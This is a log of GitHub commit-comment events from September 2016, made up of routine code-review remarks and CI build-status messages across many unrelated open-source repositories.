{"id":"4592971560","type":"CommitCommentEvent","actor":{"login":"gch1p"},"repo":{"name":"evgenyzinoviev/electron"},"payload":{"comment":{"id":19105451,"position":null,"line":null,"path":null,"commit_id":"7417821ad8f7ff6e9c669a3c3da35133c128f160","created_at":"2016-09-20T22:44:13Z","updated_at":"2016-09-20T22:44:13Z","body":"@MikeLP не доделал. Верю что штука нужная, но пока предлагаю впиливать вьюхи в native_window_mac.mm, как на примере)"}},"created_at":"2016-09-20T22:44:13Z"}
{"id":"4592972123","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19105453,"position":null,"line":null,"path":null,"commit_id":"8aa98e0d80be375991a99493164b6ed7bc23efca","created_at":"2016-09-20T22:44:19Z","updated_at":"2016-09-20T22:44:19Z","body":"os_2_0_develop (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8aa98e0d80be375991a99493164b6ed7bc23efca-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8aa98e0d80be375991a99493164b6ed7bc23efca-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-20T22:44:19Z"}
{"id":"4592972353","type":"CommitCommentEvent","actor":{"login":"Fixer-007"},"repo":{"name":"minetest/minetest"},"payload":{"comment":{"id":19105454,"position":null,"line":null,"path":null,"commit_id":"3aefa5d3ceaaa9299f42cc10921dec65fa53c5e0","created_at":"2016-09-20T22:44:22Z","updated_at":"2016-09-20T22:44:22Z","body":"@paramat but why crashing entire server if you can output simple warning and leave server admin headache-free."}},"created_at":"2016-09-20T22:44:22Z"}
{"id":"4592977134","type":"CommitCommentEvent","actor":{"login":"mutec"},"repo":{"name":"MysteryCode/de.mysterycode.translate"},"payload":{"comment":{"id":19105463,"position":58,"line":58,"path":"files/lib/system/cronjob/SyncWCFLanguageItemsCronjob.class.php","commit_id":"05b762ba5a43f97f791c7e7711f7b13abe65f871","created_at":"2016-09-20T22:45:30Z","updated_at":"2016-09-20T22:45:30Z","body":"Then I have to fetch the existing ones within this foreach, which causes some more queries. I'll think about it."}},"created_at":"2016-09-20T22:45:30Z"}
{"id":"4592980239","type":"CommitCommentEvent","actor":{"login":"arnabd88"},"repo":{"name":"utahfmr/VULFI"},"payload":{"comment":{"id":19105473,"position":4,"line":7,"path":"master/lib/FaultInjector.cpp","commit_id":"458332dbf7b4d23b7d3298b6445f07838edff143","created_at":"2016-09-20T22:46:14Z","updated_at":"2016-09-20T22:46:14Z","body":"Hi Vishal,\r\n\r\nThis is not required anymore since we are not using LLVMGetGlobalContext. Have removed this line."}},"created_at":"2016-09-20T22:46:14Z"}
{"id":"4592981401","type":"CommitCommentEvent","actor":{"login":"arnabd88"},"repo":{"name":"utahfmr/VULFI"},"payload":{"comment":{"id":19105474,"position":14,"line":87,"path":"master/lib/FaultInjector.cpp","commit_id":"458332dbf7b4d23b7d3298b6445f07838edff143","created_at":"2016-09-20T22:46:32Z","updated_at":"2016-09-20T22:46:32Z","body":"Hi Vishal,\r\n\r\nHave removed the commented code."}},"created_at":"2016-09-20T22:46:32Z"}
{"id":"4592981655","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19105475,"position":null,"line":null,"path":null,"commit_id":"8aa98e0d80be375991a99493164b6ed7bc23efca","created_at":"2016-09-20T22:46:36Z","updated_at":"2016-09-20T22:46:36Z","body":"os_2_0_develop (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8aa98e0d80be375991a99493164b6ed7bc23efca-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8aa98e0d80be375991a99493164b6ed7bc23efca-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-20T22:46:36Z"}
{"id":"4592982803","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19105479,"position":null,"line":null,"path":null,"commit_id":"69affeb17a69b05df08437f1c3ced982c7eac0f7","created_at":"2016-09-20T22:46:54Z","updated_at":"2016-09-20T22:46:54Z","body":"EMS (brianlball) - x86_64-MacOS-10.10-clang: OK (2314 of 2479 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-69affeb17a69b05df08437f1c3ced982c7eac0f7-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-69affeb17a69b05df08437f1c3ced982c7eac0f7-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.34%25-yellow.svg)</a> \n"}},"created_at":"2016-09-20T22:46:54Z"}
{"id":"4592982952","type":"CommitCommentEvent","actor":{"login":"queenvictoria"},"repo":{"name":"Laudanum/ldap"},"payload":{"comment":{"id":19105480,"position":4,"line":539,"path":"ldap_user/src/LdapUserConf.php","commit_id":"b538b59ee024d631011f33b61683263a3f2d9169","created_at":"2016-09-20T22:46:57Z","updated_at":"2016-09-20T22:46:57Z","body":"Please don't use this repo. Development is on D.)."}},"created_at":"2016-09-20T22:46:57Z"}
{"id":"4592983701","type":"CommitCommentEvent","actor":{"login":"hlokavarapu"},"repo":{"name":"EGP-CIG-REU/aspect"},"payload":{"comment":{"id":19105485,"position":227,"line":204,"path":"source/postprocess/richardson_extrapolation.cc","commit_id":"c14c4018e0e24d5f46c6d64732fb6937b911ef8c","created_at":"2016-09-20T22:47:08Z","updated_at":"2016-09-20T22:47:08Z","body":"Got it. Is this how you would set that up?\r\n```\r\n            FEValues<dim> fe_values(this->get_mapping(),\r\n                                    this->get_fe(),\r\n                                    this->get_fe().base_element(this->introspection().base_elements.velocities).get_unit_support_points(),\r\n                                    update_values |\r\n                                    update_quadrature_points |\r\n                                    update_JxW_values);\r\n```"}},"created_at":"2016-09-20T22:47:08Z"}
{"id":"4592984466","type":"CommitCommentEvent","actor":{"login":"lihux25"},"repo":{"name":"cms-sw/cmssw"},"payload":{"comment":{"id":19105489,"position":18,"line":690,"path":"EventFilter/HcalRawToDigi/src/HcalUnpacker.cc","commit_id":"5da0e171472b5db8e26c631aea0d83e4c8b5c4b6","created_at":"2016-09-20T22:47:19Z","updated_at":"2016-09-20T22:47:19Z","body":"Right, what's the flavor of the RPD? If it's the same as HF, then can the header tells further if it's RPD or HF? "}},"created_at":"2016-09-20T22:47:19Z"}
{"id":"4592985100","type":"CommitCommentEvent","actor":{"login":"Deadwing888"},"repo":{"name":"DarkstarProject/darkstar"},"payload":{"comment":{"id":19105491,"position":null,"line":null,"path":null,"commit_id":"b7a7ca228f311c2b06786551e31f929bdb61331d","created_at":"2016-09-20T22:47:29Z","updated_at":"2016-09-20T22:47:29Z","body":"Closes https://github.com/DarkstarProject/darkstar/issues/3146"}},"created_at":"2016-09-20T22:47:29Z"}
{"id":"4592986414","type":"CommitCommentEvent","actor":{"login":"cheapie"},"repo":{"name":"minetest/minetest"},"payload":{"comment":{"id":19105493,"position":null,"line":null,"path":null,"commit_id":"3aefa5d3ceaaa9299f42cc10921dec65fa53c5e0","created_at":"2016-09-20T22:47:49Z","updated_at":"2016-09-20T22:47:49Z","body":"I had to modify *six* mods to make *one* world load after this."}},"created_at":"2016-09-20T22:47:49Z"}
{"id":"4592986975","type":"CommitCommentEvent","actor":{"login":"arnabd88"},"repo":{"name":"utahfmr/VULFI"},"payload":{"comment":{"id":19105495,"position":24,"line":97,"path":"master/lib/FaultInjector.cpp","commit_id":"458332dbf7b4d23b7d3298b6445f07838edff143","created_at":"2016-09-20T22:47:57Z","updated_at":"2016-09-20T22:47:57Z","body":"Hi Vishal,\r\n\r\nHave Removed the commented code."}},"created_at":"2016-09-20T22:47:57Z"}
{"id":"4592988692","type":"CommitCommentEvent","actor":{"login":"vcsharma"},"repo":{"name":"utahfmr/VULFI"},"payload":{"comment":{"id":19105499,"position":14,"line":87,"path":"master/lib/FaultInjector.cpp","commit_id":"458332dbf7b4d23b7d3298b6445f07838edff143","created_at":"2016-09-20T22:48:23Z","updated_at":"2016-09-20T22:48:23Z","body":"HI, Ok. Fine"}},"created_at":"2016-09-20T22:48:23Z"}
{"id":"4592990743","type":"CommitCommentEvent","actor":{"login":"arnabd88"},"repo":{"name":"utahfmr/VULFI"},"payload":{"comment":{"id":19105504,"position":38,"line":128,"path":"master/lib/FaultInjector.cpp","commit_id":"458332dbf7b4d23b7d3298b6445f07838edff143","created_at":"2016-09-20T22:48:53Z","updated_at":"2016-09-20T22:48:53Z","body":"Hi Vishal,\r\n\r\nHave Removed the commented code."}},"created_at":"2016-09-20T22:48:53Z"}
{"id":"4592990999","type":"CommitCommentEvent","actor":{"login":"arnabd88"},"repo":{"name":"utahfmr/VULFI"},"payload":{"comment":{"id":19105505,"position":43,"line":132,"path":"master/lib/FaultInjector.cpp","commit_id":"458332dbf7b4d23b7d3298b6445f07838edff143","created_at":"2016-09-20T22:48:57Z","updated_at":"2016-09-20T22:48:57Z","body":"Hi Vishal,\r\n\r\nHave Removed the commented code."}},"created_at":"2016-09-20T22:48:57Z"}
{"id":"4592991205","type":"CommitCommentEvent","actor":{"login":"arnabd88"},"repo":{"name":"utahfmr/VULFI"},"payload":{"comment":{"id":19105506,"position":53,"line":335,"path":"master/lib/FaultInjector.cpp","commit_id":"458332dbf7b4d23b7d3298b6445f07838edff143","created_at":"2016-09-20T22:49:00Z","updated_at":"2016-09-20T22:49:00Z","body":"Hi Vishal,\r\n\r\nHave Removed the commented code."}},"created_at":"2016-09-20T22:49:00Z"}
{"id":"4592991268","type":"CommitCommentEvent","actor":{"login":"vcsharma"},"repo":{"name":"utahfmr/VULFI"},"payload":{"comment":{"id":19105507,"position":4,"line":7,"path":"master/lib/FaultInjector.cpp","commit_id":"458332dbf7b4d23b7d3298b6445f07838edff143","created_at":"2016-09-20T22:49:01Z","updated_at":"2016-09-20T22:49:01Z","body":"Ok. Good."}},"created_at":"2016-09-20T22:49:01Z"}
{"id":"4592991404","type":"CommitCommentEvent","actor":{"login":"arnabd88"},"repo":{"name":"utahfmr/VULFI"},"payload":{"comment":{"id":19105508,"position":63,"line":506,"path":"master/lib/FaultInjector.cpp","commit_id":"458332dbf7b4d23b7d3298b6445f07838edff143","created_at":"2016-09-20T22:49:04Z","updated_at":"2016-09-20T22:49:04Z","body":"Hi Vishal,\r\n\r\nHave Removed the commented code."}},"created_at":"2016-09-20T22:49:04Z"}
{"id":"4592991646","type":"CommitCommentEvent","actor":{"login":"arnabd88"},"repo":{"name":"utahfmr/VULFI"},"payload":{"comment":{"id":19105510,"position":71,"line":513,"path":"master/lib/FaultInjector.cpp","commit_id":"458332dbf7b4d23b7d3298b6445f07838edff143","created_at":"2016-09-20T22:49:08Z","updated_at":"2016-09-20T22:49:08Z","body":"Hi Vishal,\r\n\r\nHave Removed the commented code."}},"created_at":"2016-09-20T22:49:08Z"}
{"id":"4592992032","type":"CommitCommentEvent","actor":{"login":"kevva"},"repo":{"name":"sindresorhus/find-up"},"payload":{"comment":{"id":19105511,"position":null,"line":null,"path":null,"commit_id":"31cd65dd389aec2c77ccab14d4c97e07427cc299","created_at":"2016-09-20T22:49:13Z","updated_at":"2016-09-20T22:49:13Z","body":"While new features won't be added to them, the older versions still work. If a severe bug is found in a module, the possibility to fix it on an older version still exists. This should be in line with Node.js own LTS schedule which states:\r\n\r\n> Once a release moves into Maintenance mode, only critical bugs, critical security fixes, and documentation updates will be permitted.\r\n"}},"created_at":"2016-09-20T22:49:13Z"}
{"id":"4592992289","type":"CommitCommentEvent","actor":{"login":"arnabd88"},"repo":{"name":"utahfmr/VULFI"},"payload":{"comment":{"id":19105512,"position":89,"line":546,"path":"master/lib/FaultInjector.cpp","commit_id":"458332dbf7b4d23b7d3298b6445f07838edff143","created_at":"2016-09-20T22:49:17Z","updated_at":"2016-09-20T22:49:17Z","body":"Hi Vishal,\r\n\r\nHave Removed the commented code."}},"created_at":"2016-09-20T22:49:17Z"}
{"id":"4593000993","type":"CommitCommentEvent","actor":{"login":"crutchcorn"},"repo":{"name":"TheAndroidMaster/Status"},"payload":{"comment":{"id":19105531,"position":null,"line":null,"path":null,"commit_id":"4bd4904e9f6d6dd25f95b52c42749826ea22572c","created_at":"2016-09-20T22:51:33Z","updated_at":"2016-09-20T22:51:33Z","body":"That's naz(i) funny. Grammar is very serious"}},"created_at":"2016-09-20T22:51:33Z"}
{"id":"4593005196","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/positron"},"payload":{"comment":{"id":19105540,"position":null,"line":null,"path":null,"commit_id":"97e21c465a23dd2d22b137f488b0b25170190a69","created_at":"2016-09-20T22:52:39Z","updated_at":"2016-09-20T22:52:39Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Tp8wsEPPRcOo6BJDHXd_sw"}},"created_at":"2016-09-20T22:52:39Z"}
{"id":"4593005603","type":"CommitCommentEvent","actor":{"login":"yinghe616"},"repo":{"name":"EGP-CIG-REU/aspect"},"payload":{"comment":{"id":19105542,"position":227,"line":204,"path":"source/postprocess/richardson_extrapolation.cc","commit_id":"c14c4018e0e24d5f46c6d64732fb6937b911ef8c","created_at":"2016-09-20T22:52:45Z","updated_at":"2016-09-20T22:52:45Z","body":"I think you should define quadrature_formula as below and keep other unchanged. \r\nconst QGaussLobatto<dim> quadrature_formula(this->get_parameters().stokes_velocity_degree+1);\r\n      \r\n\r\n"}},"created_at":"2016-09-20T22:52:45Z"}
{"id":"4593006037","type":"CommitCommentEvent","actor":{"login":"jamesmontemagno"},"repo":{"name":"jamesmontemagno/ImageCirclePlugin"},"payload":{"comment":{"id":19105543,"position":null,"line":null,"path":null,"commit_id":"c1b0fca7ef5975aa16f8ffc8e1472cdd5a6dd399","created_at":"2016-09-20T22:52:52Z","updated_at":"2016-09-20T22:52:52Z","body":"This has to do with the renames recently from: https://github.com/xamarin/Xamarin.Forms/pull/260"}},"created_at":"2016-09-20T22:52:52Z"}
{"id":"4593007289","type":"CommitCommentEvent","actor":{"login":"tawabd"},"repo":{"name":"tawabd/datasciencecoursera"},"payload":{"comment":{"id":19105551,"position":null,"line":null,"path":null,"commit_id":"4b4a2656aa434aeb0a656041551feed34c9d2648","created_at":"2016-09-20T22:53:11Z","updated_at":"2016-09-20T22:53:11Z","body":"## This is a Markdown file"}},"created_at":"2016-09-20T22:53:11Z"}
{"id":"4593007419","type":"CommitCommentEvent","actor":{"login":"6a68"},"repo":{"name":"meandavejustice/min-vid"},"payload":{"comment":{"id":19105552,"position":6,"line":73,"path":"data/icon-overlay.js","commit_id":"55a0f157e4dc46ab9094035364738b8eed262d7e","created_at":"2016-09-20T22:53:13Z","updated_at":"2016-09-20T22:53:13Z","body":"@meandavejustice This seems like an odd place to pause the video. What about pausing it above line 70? Then this line could simply say `time: videoEl.currentTIme`"}},"created_at":"2016-09-20T22:53:13Z"}
{"id":"4593009686","type":"CommitCommentEvent","actor":{"login":"geordie666"},"repo":{"name":"desihub/desitarget"},"payload":{"comment":{"id":19105557,"position":null,"line":null,"path":null,"commit_id":"facf820337f8e22fbccbabdedb453810aef86a28","created_at":"2016-09-20T22:53:47Z","updated_at":"2016-09-20T22:53:47Z","body":"Also fixed readwrite_tractor unit test by adopting the new io.whitespace_fits_read function to strip white space from string fields"}},"created_at":"2016-09-20T22:53:47Z"}
{"id":"4593010655","type":"CommitCommentEvent","actor":{"login":"dsnet"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19105560,"position":5,"line":5,"path":"stack/stack.go","commit_id":"2298f8a0d3b806966a36670d789ccc5a2b761d4f","created_at":"2016-09-20T22:54:04Z","updated_at":"2016-09-20T22:54:04Z","body":"How is len different from len(stack)?"}},"created_at":"2016-09-20T22:54:04Z"}
{"id":"4593011482","type":"CommitCommentEvent","actor":{"login":"twaugh"},"repo":{"name":"projectatomic/osbs-client"},"payload":{"comment":{"id":19105562,"position":12,"line":443,"path":"osbs/build/build_request.py","commit_id":"004ceb69c27c0f119fae89a93fb6c215a43d9461","created_at":"2016-09-20T22:54:17Z","updated_at":"2016-09-20T22:54:17Z","body":"The build host and architecture have been set here since before atomic-reactor knew how to set them automatically (around March/April I think).\r\n\r\nMaybe it's time to stop setting them here?"}},"created_at":"2016-09-20T22:54:17Z"}
{"id":"4593014599","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/positron"},"payload":{"comment":{"id":19105569,"position":null,"line":null,"path":null,"commit_id":"05032784f857233a90da0ad3fa830c409d5b0405","created_at":"2016-09-20T22:55:10Z","updated_at":"2016-09-20T22:55:10Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#NBJxpnejR6W5dmXDdWMTyg"}},"created_at":"2016-09-20T22:55:10Z"}
{"id":"4593015769","type":"CommitCommentEvent","actor":{"login":"yinghe616"},"repo":{"name":"EGP-CIG-REU/aspect"},"payload":{"comment":{"id":19105574,"position":125,"line":126,"path":"source/postprocess/richardson_extrapolation.cc","commit_id":"c14c4018e0e24d5f46c6d64732fb6937b911ef8c","created_at":"2016-09-20T22:55:27Z","updated_at":"2016-09-20T22:55:27Z","body":"Here should be also consistent with the h/2 level\r\nQGaussLobatto<1> base_quadrature(this->get_parameters().stokes_velocity_degree+1)"}},"created_at":"2016-09-20T22:55:27Z"}
{"id":"4593017534","type":"CommitCommentEvent","actor":{"login":"dsouzasccp"},"repo":{"name":"dsouzasccp/Ol-Mundo"},"payload":{"comment":{"id":19105578,"position":null,"line":null,"path":null,"commit_id":"ffb9bc1fe4ec3e9447d1c93ada5cab570bd97bf5","created_at":"2016-09-20T22:55:55Z","updated_at":"2016-09-20T22:55:55Z","body":"j"}},"created_at":"2016-09-20T22:55:55Z"}
{"id":"4593023415","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19105590,"position":null,"line":null,"path":null,"commit_id":"4e9a0e325d0afda1835682db40a680e5dc3af981","created_at":"2016-09-20T22:57:18Z","updated_at":"2016-09-20T22:57:18Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/513/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-2076)."}},"created_at":"2016-09-20T22:57:18Z"}
{"id":"4593029174","type":"CommitCommentEvent","actor":{"login":"jarek-foksa"},"repo":{"name":"jarek-foksa/path-data-polyfill.js"},"payload":{"comment":{"id":19105616,"position":null,"line":null,"path":null,"commit_id":"db90789cb4df447be0de1b42061e27f11684928a","created_at":"2016-09-20T22:58:52Z","updated_at":"2016-09-20T22:58:52Z","body":"This code is not just converting a number to a string, it is converting a number to a string with a fixed precision. I'm not sure what's the point of that though, I copied the code from https://github.com/DmitryBaranovskiy/raphael/blob/v2.1.1/dev/raphael.core.js#L1872 and I didn't bother contemplating it too much since it worked just fine."}},"created_at":"2016-09-20T22:58:52Z"}
{"id":"4593030076","type":"CommitCommentEvent","actor":{"login":"sbrossie"},"repo":{"name":"killbill/killbill-analytics-ui"},"payload":{"comment":{"id":19105618,"position":null,"line":null,"path":null,"commit_id":"9523b5c2c70ed4ec5736ec7243c4bc5874f16874","created_at":"2016-09-20T22:59:06Z","updated_at":"2016-09-20T22:59:06Z","body":"👍 "}},"created_at":"2016-09-20T22:59:06Z"}
{"id":"4593034081","type":"CommitCommentEvent","actor":{"login":"hlokavarapu"},"repo":{"name":"EGP-CIG-REU/aspect"},"payload":{"comment":{"id":19105631,"position":227,"line":204,"path":"source/postprocess/richardson_extrapolation.cc","commit_id":"c14c4018e0e24d5f46c6d64732fb6937b911ef8c","created_at":"2016-09-20T23:00:11Z","updated_at":"2016-09-20T23:00:11Z","body":"Something is wrong....\r\n\r\nIf fe_values is initialized as above then the function call\r\n\r\n`const std::vector<double>  jacobian_weights = fe_values.get_JxW_values();`\r\n, from the debugger, is evaluated as \r\n\r\n```\r\n(gdb) p jacobian_weights \r\n$1 = std::vector of length 9, capacity 9 = {inf, inf, inf, inf, inf, inf, inf, inf, inf}\r\n```"}},"created_at":"2016-09-20T23:00:11Z"}
{"id":"4593039333","type":"CommitCommentEvent","actor":{"login":"epkann"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19105643,"position":5,"line":5,"path":"stack/stack.go","commit_id":"2298f8a0d3b806966a36670d789ccc5a2b761d4f","created_at":"2016-09-20T23:01:27Z","updated_at":"2016-09-20T23:01:27Z","body":"oh oops. I should have written:\n\nfunc (s *Stack) Len() int  {\n      return len(s.stack)\n}\n\nI need to provide a Len function, though, right? Because the Stack type is\na struct and the stack field is an unexported slice.\n\n\n\nOn Tue, Sep 20, 2016 at 5:54 PM, Joe Tsai <notifications@github.com> wrote:\n\n> How is len different from len(stack)?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/epkann/Data-Structures/commit/2298f8a0d3b806966a36670d789ccc5a2b761d4f#commitcomment-19105560>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ASib1zpB-Ks0q95Pr_6wFao8DH5tvLbiks5qsGQMgaJpZM4KCOtE>\n> .\n>\n\n\n\n-- \nwww.esthertsai.com\n"}},"created_at":"2016-09-20T23:01:27Z"}
{"id":"4593042188","type":"CommitCommentEvent","actor":{"login":"stbaer"},"repo":{"name":"stbaer/Keen-UI"},"payload":{"comment":{"id":19105650,"position":null,"line":null,"path":null,"commit_id":"4a1624344d69dddca315845a85829a60612a7d1a","created_at":"2016-09-20T23:02:12Z","updated_at":"2016-09-20T23:02:12Z","body":"Ya, think you are right. Will update it later today. Maybe also `var holder = event.currentTarget || event.taget.` ?"}},"created_at":"2016-09-20T23:02:12Z"}
{"id":"4593042564","type":"CommitCommentEvent","actor":{"login":"nathanhammond"},"repo":{"name":"sindresorhus/find-up"},"payload":{"comment":{"id":19105651,"position":null,"line":null,"path":null,"commit_id":"31cd65dd389aec2c77ccab14d4c97e07427cc299","created_at":"2016-09-20T23:02:18Z","updated_at":"2016-09-20T23:02:18Z","body":"@kevva This sounds good, we're not asking people to follow our patterns exactly. 😄 We follow a release train model which means that we don't have a reasonable backport strategy. Mostly hoping to make people conscientious of LTS and getting plans in place for the future."}},"created_at":"2016-09-20T23:02:18Z"}
{"id":"4593047853","type":"CommitCommentEvent","actor":{"login":"mdlugosz1"},"repo":{"name":"mdlugosz1/kodilla-projekt"},"payload":{"comment":{"id":19105664,"position":21,"line":21,"path":"gruntfile.js","commit_id":"a2c2eda48fc95c77c767e62e041cc161631278b5","created_at":"2016-09-20T23:03:45Z","updated_at":"2016-09-20T23:03:45Z","body":"gwiazdki usunięte :)"}},"created_at":"2016-09-20T23:03:45Z"}
{"id":"4593051763","type":"CommitCommentEvent","actor":{"login":"OwnageIsMagic"},"repo":{"name":"VkOpt/VkOpt"},"payload":{"comment":{"id":19105674,"position":50,"line":2099,"path":"source/vk_lib.js","commit_id":"d655d06e2432d0d00c68deee798e9a410dd34384","created_at":"2016-09-20T23:04:45Z","updated_at":"2016-09-20T23:04:45Z","body":"Последняя версия сафари под винду вышла 4 года назад, после чего благополучно умерла и воскресать не собирается. а занятия некромантией запрещены конституцией РФ."}},"created_at":"2016-09-20T23:04:45Z"}
{"id":"4593059530","type":"CommitCommentEvent","actor":{"login":"quinnj"},"repo":{"name":"JuliaData/DataStreams.jl"},"payload":{"comment":{"id":19105693,"position":63,"line":73,"path":"docs/src/index.md","commit_id":"359240329728cdf7d784a78316f8c409ab97a614","created_at":"2016-09-20T23:06:32Z","updated_at":"2016-09-20T23:06:32Z","body":"A general ping/notification to @davidanthoff, @davidagold, @JeffBezanson, and @yeesian. I've just finished up the last part of the broader \"Project Decouple\". Both `Data.Source` and `Data.Sink` are now decoupled from `Data.stream!`. i.e. the DataStreams.jl package itself defines a generic `Data.stream!` method for both `Data.Field` and `Data.Column` streaming, with `Data.Source`s only needing to implement `Data.getfield`/`Data.getcolumn`, and `Data.Sink`s only needing to implement `Data.streamfield!`/`Data.streamcolumn!`. The current master branch of CSV.jl, SQLite.jl, Feather.jl, DataStreams.jl, and ODBC.jl all include working, tested implementations of the new Sink decoupling, so feel free to check those out for references. \r\n\r\nAlso sorry if this causes undue API churn. The DataStreams project overall has been evolving quite a bit from the early days of just reading csv files and it's pretty cool what is now possible. Definitely feel free to open issues here or elsewhere with questions or how I can help. All of you have reached out at one time or another and I'm happy to take a look at code and help refine things as needed."}},"created_at":"2016-09-20T23:06:32Z"}
{"id":"4593064871","type":"CommitCommentEvent","actor":{"login":"Arnavion"},"repo":{"name":"jarek-foksa/path-data-polyfill.js"},"payload":{"comment":{"id":19105705,"position":null,"line":null,"path":null,"commit_id":"db90789cb4df447be0de1b42061e27f11684928a","created_at":"2016-09-20T23:08:00Z","updated_at":"2016-09-20T23:08:00Z","body":"Yes, that's my point. It's not like Math.asin cares if you give it a number with too many decimal digits."}},"created_at":"2016-09-20T23:08:00Z"}
{"id":"4593067211","type":"CommitCommentEvent","actor":{"login":"kevinoliver"},"repo":{"name":"adriaanm/util"},"payload":{"comment":{"id":19105712,"position":null,"line":null,"path":null,"commit_id":"17625f46400dcc3b777168e47b8244f932372794","created_at":"2016-09-20T23:08:38Z","updated_at":"2016-09-20T23:08:38Z","body":"@adriaanm this got sorted out in https://github.com/twitter/util/commit/90f218014dfbd85bf3d7b91246dee98cfda01161\r\n\r\n(got pointed here via https://github.com/twitter/util/issues/174)"}},"created_at":"2016-09-20T23:08:38Z"}
{"id":"4593072587","type":"CommitCommentEvent","actor":{"login":"hlokavarapu"},"repo":{"name":"EGP-CIG-REU/aspect"},"payload":{"comment":{"id":19105722,"position":125,"line":126,"path":"source/postprocess/richardson_extrapolation.cc","commit_id":"c14c4018e0e24d5f46c6d64732fb6937b911ef8c","created_at":"2016-09-20T23:10:08Z","updated_at":"2016-09-20T23:10:08Z","body":"Fixed\r\n"}},"created_at":"2016-09-20T23:10:08Z"}
{"id":"4593076780","type":"CommitCommentEvent","actor":{"login":"TazeTSchnitzel"},"repo":{"name":"witch-house/pronoun.is"},"payload":{"comment":{"id":19105728,"position":null,"line":null,"path":null,"commit_id":"06f82d6837867f6e2dcf39257f6ad26e38738556","created_at":"2016-09-20T23:11:12Z","updated_at":"2016-09-20T23:11:12Z","body":"😍"}},"created_at":"2016-09-20T23:11:12Z"}
{"id":"4593077200","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19105730,"position":null,"line":null,"path":null,"commit_id":"ccd59710a3f1d06bc165de5e276f9280fa8a1dc9","created_at":"2016-09-20T23:11:19Z","updated_at":"2016-09-20T23:11:19Z","body":"OS X had some issues with this commit. We backed it out at [Commit c298dfdbb017076d](http://github.com/weidai11/cryptopp/commit/c298dfdbb017076de1e2f1b6bb8ccd00fe85fb95)."}},"created_at":"2016-09-20T23:11:19Z"}
{"id":"4593077726","type":"CommitCommentEvent","actor":{"login":"yinghe616"},"repo":{"name":"EGP-CIG-REU/aspect"},"payload":{"comment":{"id":19105733,"position":227,"line":204,"path":"source/postprocess/richardson_extrapolation.cc","commit_id":"c14c4018e0e24d5f46c6d64732fb6937b911ef8c","created_at":"2016-09-20T23:11:27Z","updated_at":"2016-09-20T23:11:27Z","body":"I didn't have problem to compile."}},"created_at":"2016-09-20T23:11:27Z"}
{"id":"4593079147","type":"CommitCommentEvent","actor":{"login":"gparai"},"repo":{"name":"apache/drill"},"payload":{"comment":{"id":19105735,"position":null,"line":null,"path":null,"commit_id":"da5981da6d25dbe8dff1468589be1e381b7e0251","created_at":"2016-09-20T23:11:49Z","updated_at":"2016-09-20T23:11:49Z","body":"+1 LGTM"}},"created_at":"2016-09-20T23:11:49Z"}
{"id":"4593080181","type":"CommitCommentEvent","actor":{"login":"dsnet"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19105737,"position":5,"line":5,"path":"stack/stack.go","commit_id":"2298f8a0d3b806966a36670d789ccc5a2b761d4f","created_at":"2016-09-20T23:12:08Z","updated_at":"2016-09-20T23:12:08Z","body":"In terms of practical usage, a stack is probably not a data structure worth abstracting as a separate package. When you remove the len field, `Pop` is equivalent to slicing off the last element, `Push` is equivalent to `append`.\r\n\r\nIn terms of implementing a stack for your own learning, I think `Pop`, `Push`, `Len` is a perfectly fine set of methods that it should have."}},"created_at":"2016-09-20T23:12:08Z"}
